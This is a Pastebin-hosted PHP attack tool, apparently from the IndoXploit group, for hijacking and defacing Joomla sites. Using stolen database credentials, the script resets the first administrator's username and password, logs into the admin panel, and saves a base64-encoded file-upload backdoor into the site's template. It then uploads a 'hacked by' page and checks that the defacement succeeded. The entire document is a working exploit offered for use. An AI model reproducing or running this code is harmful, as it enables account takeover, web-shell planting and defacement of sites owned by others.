Tu5b0l3d

Auto Deface Joomla if you get config v1.3

Dec 8th, 2015
486
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.44 KB | None | 0 0
  1. <?php
  2.  
  3. //Tu5b0l3d
  4. //thx to: IndoXploit
  5. //http://indoxploit.blogspot.com/2015/12/auto-deface-cms-joomla-if-you-get-config.html
  6.  
  7. error_reporting(0);
  8.     if($_POST['submitt']){
  9.  
  10.        
  11. function pereg($anu,$pereg){
  12.                     $ch2 = curl_init ("$anu");
  13.                     curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  14.                    curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  15.                     curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  16.                     curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  17.                     curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  18.                     curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
  19.                     curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
  20.                     $data = curl_exec ($ch2);
  21.                                
  22.                         preg_match("/$pereg/", $data, $token1);
  23.                         return $token1[1];
  24. }
  25.  
  26. function ngecurl($sites){
  27.         $ch1 = curl_init ("$sites");
  28. curl_setopt ($ch1, CURLOPT_RETURNTRANSFER, 1);
  29. curl_setopt ($ch1, CURLOPT_FOLLOWLOCATION, 1);
  30. curl_setopt ($ch1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  31. curl_setopt ($ch1, CURLOPT_SSL_VERIFYPEER, 0);
  32. curl_setopt ($ch1, CURLOPT_SSL_VERIFYHOST, 0);
  33. curl_setopt($ch1, CURLOPT_COOKIEJAR,'coker_log');
  34. curl_setopt($ch1, CURLOPT_COOKIEFILE,'coker_log');
  35. $data = curl_exec ($ch1);
  36. return $data;
  37.     }
  38.  
  39. function ambilkata($param, $kata1, $kata2){
  40.     if(strpos($param, $kata1) === FALSE) return FALSE;
  41.     if(strpos($param, $kata2) === FALSE) return FALSE;
  42.     $start = strpos($param, $kata1) + strlen($kata1);
  43.     $end = strpos($param, $kata2, $start);
  44.     $return = substr($param, $start, $end - $start);
  45.     return $return;
  46. }
  47.  
  48. function lohgin($fak1,$fak2,$fak3,$fak4,$fak5){
  49.     $post2 = array(
  50.                     "username" => "$fak1",
  51.                     "passwd" => "$fak2",
  52.                     "lang" => "en-GB",
  53.                     "option" => "com_login",
  54.                     "task" => "login",
  55.                     "return" => "$fak3",
  56.                     "$fak4" => "1",
  57.                    
  58.                     );
  59.  
  60. $ch = curl_init ("$fak5");
  61. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  62. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  63. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  64. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  65. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  66. curl_setopt ($ch, CURLOPT_POST, 1);
  67. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post2);
  68. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  69. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  70. $prett = curl_exec($ch);
  71. return $prett;
  72. }
  73.         $host = $_POST['host'];
  74.         $username = $_POST['username'];
  75.         $password = $_POST['password'];
  76.         $db = $_POST['db'];
  77.         $dbprefix = $_POST['dbprefix'];
  78.         $user_baru = $_POST['user_baru'];
  79.         $password_baru = $_POST['password_baru'];
  80.         $tanya = $_POST['tanya'];
  81.         $target = $_POST['target'];
  82.         $hackedby = $_POST['hackedby'];
  83.         $prefix = $dbprefix."users";
  84.         $pass = md5("$password_baru");
  85.         $upda = $db.".".$dbprefix;
  86.  
  87.         mysql_connect($host,$username,$password);
  88.  
  89.         mysql_select_db($db);
  90.  
  91.  
  92.  $tampil=mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  93.     $r=mysql_fetch_array($tampil);
  94.         $id = $r[id];
  95.        
  96.          mysql_query("UPDATE $prefix SET password='$pass',username='$user_baru' WHERE id='$id'");
  97.  
  98.             if ($tanya == "y"){
  99.                 $nama_template = "beez";
  100.                 echo "# $target<br>";
  101.                 echo "# Template -> $nama_template<br>";
  102.  
  103.                 $path = "/administrator/index.php?option=com_templates&task=edit_source&client=0&id=$nama_template";
  104.                 $site = $target.$path;
  105.                 echo "# Url -> $site<br>";
  106.                 $token1 = pereg($site, '<input type=\"hidden\" name=\"return\" value=\"(.*?)\" \/>');
  107.                 $token2 = pereg($site, '<input type=\"hidden\" name=\"(.*?)\" value=\"1\" \/>');
  108.  
  109. //Login            
  110. $aso2 = lohgin($user_baru,$password_baru,$token1,$token2,$site);
  111. $extensi = ngecurl($site);
  112.  
  113. $upload = base64_decode("Z3cgZ2FudGVuZw0KPD9waHANCiAgJGZpbGUgPSAkX0ZJTEVTWydmaWxlJ107DQogICRuZXdmaWxlPSJrLnBocCI7DQoJCWlmIChmaWxlX2V4aXN0cygiLi4vLi4vIi4kbmV3ZmlsZSkpIHVubGluaygiLi4uLi8vIi4kbmV3ZmlsZSk7DQogICAgCW1vdmVfdXBsb2FkZWRfZmlsZSgkZmlsZVsndG1wX25hbWUnXSwgIi4uLy4uLyRuZXdmaWxlIik7DQo/Pg0K");
  114. $coeg = "$target/administrator/index.php?option=com_templates&layout=edit";
  115. echo "# Uploading...<br>";
  116.  
  117. //$token3 = pereg($coeg, '<input type=\"hidden\" name=\"(.*?)\" value=\"1\" \/>');
  118. $post2 = array(
  119.                     "filecontent" => "$upload",
  120.                     "id" => "$nama_template",
  121.                     "cid[]" => "$nama_template",
  122.                     "option"=> "com_templates",
  123.                     "task"=> "save_source",
  124.                     "client"=> "0",
  125.                     "$token2" => "1",
  126.                     );
  127.  
  128. $ch3 = curl_init ("$coeg");
  129. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  130. curl_setopt ($ch3, CURLOPT_FOLLOWLOCATION, 1);
  131. curl_setopt ($ch3, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  132. curl_setopt ($ch3, CURLOPT_SSL_VERIFYPEER, 0);
  133. curl_setopt ($ch3, CURLOPT_SSL_VERIFYHOST, 0);
  134. curl_setopt ($ch3, CURLOPT_POST, 1);
  135. curl_setopt ($ch3, CURLOPT_POSTFIELDS, $post2);
  136. curl_setopt($ch3, CURLOPT_COOKIEJAR,'coker_log');
  137. curl_setopt($ch3, CURLOPT_COOKIEFILE,'coker_log');
  138. $masuk2 = curl_exec ($ch3);
  139.  
  140. if(preg_match("#successfully#is", $masuk2)){
  141. echo "# uploader udh ketanem...<br>";
  142. echo "# lanjut mepes...<br>";
  143.  
  144. $www = "m.php";
  145. $fp5 = fopen($www,"w");
  146. fputs($fp5,$hackedby);
  147.  
  148. $ch4 =curl_init("$target/templates/$nama_template/index.php");
  149.                             curl_setopt($ch4, CURLOPT_POST, true);
  150.                             curl_setopt($ch4, CURLOPT_POSTFIELDS,
  151.                             array('file'=>"@$www"));
  152.                             curl_setopt($ch4, CURLOPT_RETURNTRANSFER, 1);
  153.                             curl_setopt ($ch4, CURLOPT_SSL_VERIFYPEER, 0);
  154.                             curl_setopt ($ch4, CURLOPT_SSL_VERIFYHOST, 0);
  155.                             $postResult = curl_exec($ch4);
  156.                             curl_close($ch4);
  157.  
  158.  
  159.    $ch5 = "$target/k.php";
  160. $file2 = @file_get_contents($ch5);
  161.                            
  162.  
  163.                      if(preg_match('#hacked#is', $file2)){
  164.                         echo "# <font color='green'>berhasil mepes...</font><br>";
  165.                         echo "$target/k.php<br>";
  166.                     }
  167.                     else{
  168.                         echo "# <font color='red'>gagal mepes...</font><br>";
  169.                         echo "# coba aja manual: <br>";
  170.                         echo "# $target/administrator<br>";
  171.                         echo "# username: $user_baru<br>";
  172.                         echo "# password: $password_baru<br>";                  
  173.                     }
  174.                
  175. }
  176. else{
  177.     echo "# failed<br>";
  178.     echo "# data udh bener. beda versi joomla mungkin :(<br>";
  179.     echo "# coba aja manual: <br>";
  180.     echo "# $target/administrator<br>";
  181.     echo "# username: $user_baru<br>";
  182.     echo "# password: $password_baru<br><br>";
  183. }
  184.          }
  185.             elseif($tanya == "n"){
  186.             echo "# Sukses<br>";
  187.             echo "# username: $user_baru<br>";
  188.             echo "# password: $password_baru<br>";
  189.  
  190.             }
  191.        
  192.         }
  193.  
  194.         else{
  195.  
  196.             echo '<html>
  197.  
  198.    <head>
  199.        <title>Edit user in joomla v1.1</title>
  200.    </head>
  201.  
  202.    <body>
  203.        <center>
  204.                        <h2>Joomla | created by IndoXploit</h2>
  205.  
  206.                        <table>
  207.  
  208.                            <tr><td><form method="post" action="?action"></td></tr>
  209.  
  210.                            <tr><td><input type="text" name="host" placeholder="localhost"></td></tr>
  211.  
  212.                            <tr><td><input type="text" name="username" placeholder="User DB"></td></tr>
  213.  
  214.                            <tr><td><input type="text" name="password" placeholder="Password DB"></td></tr>
  215.  
  216.                            <tr><td><input type="text" name="db" placeholder="Database"></td></tr>
  217.  
  218.                            <tr><td><input type="text" name="dbprefix" placeholder="dbprefix"></td></tr>
  219.  
  220.                            <tr><td><input type="text" name="user_baru" placeholder="Username Baru"></td></tr>
  221.  
  222.                            <tr><td><input type="text" name="password_baru" placeholder="Password Baru"></td></tr>
  223.                            <tr><td></td></tr>
  224.                            <tr><td></td></tr>
  225.                          
  226.  
  227.                            <tr><td> Auto Deface <input type="radio" name="tanya" value="y"> y <input type="radio" name="tanya" value="n"> n</td></tr>
  228.                             <tr><td><input type="text" name="target" placeholder="www.IndoXploit.org"></td></tr>
  229.                             <tr><td><input type="text" name="hackedby" placeholder="Hacked By Tu5b0l3d"></td></tr>
  230.  
  231.                            <tr><td><input type="submit" value="Submit" name="submitt"></td></tr>
  232.  
  233.                        </table>
  234.                        *nb: kalo milih y ... silahkan masukin nama sitenya, kalo ngk tau nama sitenya, pilih n
  235.  
  236.            </center>
  237.  
  238.    </body>';
  239.  
  240.         }
  241.  
  242.  
  243.  
  244. ?>
Add Comment
Please, Sign In to add comment